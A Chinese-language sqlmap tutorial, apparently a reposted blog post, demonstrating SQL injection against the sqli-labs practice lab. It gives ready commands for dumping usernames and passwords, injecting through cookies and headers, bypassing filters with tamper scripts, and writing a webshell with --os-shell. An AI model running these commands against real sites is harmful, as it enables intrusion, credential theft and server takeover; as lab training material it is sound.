需要安裝python2的環境
使用方法:
用最基礎的get型注入開始
1、當我們發現注入點的時候,
python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1"
2、查看所有的資料庫
python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dbs
3、查看當前使用的資料庫
python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --current-db
4、發現使用的是security資料庫,接下來對此資料庫進行查詢
python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --tables -D "security"
5、查出所有表以后,對users表的列名進行查詢
python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --columns -T "users" -D "security"
6、users表中的列名已經知道了,可以直接查出所有資料
python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dump -C "id,username,password" -T "users" -D "security"
在“用戶”-》“.sqlmap”-》“output”可看到查詢結果
1、get請求
python2 sqlmap.py -u "urls" --dbms=mysql --batch --level 3 --risk 3
--dbms=mysql 指定資料庫為mysql
--batch 不用點擊,一路自動默認
--level 3 level指的是payload的強度,分為5擋,通常使用3級以上會有更多的payload
--risk 3 risk指的是風險等級,一般有3擋,主要也是跟攻擊的強度有關
2、post請求
第一種:python2 sqlmap.py -u "urls" --data="https://www.cnblogs.com/gx991010/p/user=admin&pass=pass"
以sqli-lab 11關為例:
python2 sqlmap.py -u "http://192.168.100.200:8004/Less-11/index.php" --data="https://www.cnblogs.com/gx991010/p/uname=admin&passwd=admin" --dbms=mysql --batch
第二種:將post資料包抓下來后存放到sqlmap的作業目錄下,命名為"1.txt"
python2 sqlmap.py -r "1.txt"
以sqli-lab 11關為例:
python2 sqlmap.py -r "1.txt" --dbms=mysql --batch
3、http頭的注入
http頭注入就要用到--level 3,頭注入的要領就是提前宣告頭部資訊,
cookie:
python2 sqlmap.py -u "http://192.168.100.200:8004/Less-20/index.php" --cookie="uname=admin" --level 3 --dbms=mysql --batch
這里的--cookie只是設定我這個sqlmap腳本去請求的cookie值,只有加了--level 3之后才會對cookie地方進行注入
referer,user-agent其他的http:
原理和用法都跟cookie相同,引數不同而已,--referer= ,--user-agent=
最省力的方式就是講要注入的資料包抓包存放到sqlmap作業檔案夾內,在要注入的地方后面加上*號,然后再使用-r像post注入一樣的用法
4、tamper使用
tamper是sqlmap中內置的一些繞過防護過濾的一些字符轉換腳本
python2 sqlmap.py -u "urls" --tamper=""
tamper的路徑在\sqlmap\tamper下,tamper是死的,人是活的,要根據實際情況靈活應用,
5、寫入webshell
當發現注入點,并且注入點可寫的情況下
以less-1為例:
1、獲取注入點 :
python2 sqlmap.py -u "http://192.168.100.200:8004/Less-1/?id=1" --dbms=mysql --batch
2、查看當前用戶:
python2 sqlmap.py -u "http://192.168.100.200:8004/Less-1/?id=1" --dbms=mysql --current-user
3、確認當前用戶是否DBA(資料庫管理員)權限:
python2 sqlmap.py -u "http://192.168.100.200:8004/Less-1/?id=1" --dbms=mysql --is-dba
4、確認是DBA后,開始執行木馬寫入:
python2 sqlmap.py -u "http://192.168.100.200:8004/Less-1/?id=1" --dbms=mysql --os-shell
接下來會選擇腳本語言以及寫入的路徑,選擇好后就可以直接獲得系統權限,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/5092.html
標籤:其他
上一篇:其他型別的注入
下一篇:xss講解
